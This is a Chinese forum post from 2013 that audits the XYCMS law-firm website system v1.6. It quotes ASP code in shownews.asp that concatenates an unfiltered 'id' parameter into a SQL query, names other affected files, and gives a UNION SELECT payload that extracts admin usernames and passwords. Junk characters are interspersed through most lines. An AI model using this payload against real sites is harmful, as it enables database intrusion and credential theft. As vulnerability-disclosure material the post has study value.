前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似$ W4 E% L3 d F5 T0 ?4 e) ?
3 I9 N N, e( ^" |
淫荡分割线
9 }7 R( P6 Y- H1 n V--------------------------------------------------------! G% H% h2 C8 W% a, ^
" ?! E) P8 r+ H2 v! B审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)& q; b5 a2 G( ?$ Q5 d& ?$ e, D6 l
源码地址:http://down.chinaz.com/soft/29233.htm+ \4 @+ B* s8 b3 g1 u; p8 a6 d- V
/ g" \" K0 u0 a4 o* c. d0 W
漏洞文件:shownews.asp
( K- ?/ p- T$ t. @9 w漏洞代码:7-13行% Q. W6 h5 }. y0 R/ d7 B: r4 D
1 [, d; \; l1 l8 w
" d/ `! J% R" U- t [2 b<%
8 @$ l9 t; j# j0 L4 Aid=request.QueryString("id")' B7 d: O4 w9 m5 Q0 w" V+ A
) ^+ G* o Q1 T4 P- j* ]set snews=server.createobject("adodb.recordset")
, t. n8 y- E R8 q3 v. ], R; ^8 bexec="select * from [news] where id="&id
; q# @: A' i3 i2 W* {* usnews.open exec,conn,1,1' t7 Y- i4 X4 C: R. m% d
%>9 v+ y) z9 B5 X, O7 Y! u6 L; ~
6 g7 T; }5 q P$ g9 @0 v c # h3 j* p/ r/ r' S) D
什么过滤都没有 直造成注入
% h s! v5 |7 K$ f) A( w 7 @# n$ |/ Y0 d |, o; b' B) M
注入点:http://127.0.0.1:99/shownews.asp?id=xx
6 P1 s# s& ~. f ( a' Y" m" P4 B0 I$ s* l. v
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找) ^& Q6 B6 q' H3 c- Q' @' \, }
& B8 m+ K& {( Z- `( _" g+ R
' w$ U/ ~+ c% u# Y6 }1 N2 F# \: M
exp: union select 1,admin,password,4,5,7 from admin_user& _0 c+ J7 ?" L; g
- z3 h& \# a. R; x
|
发表于 2013-4-4 17:28:12
收藏
支持
反对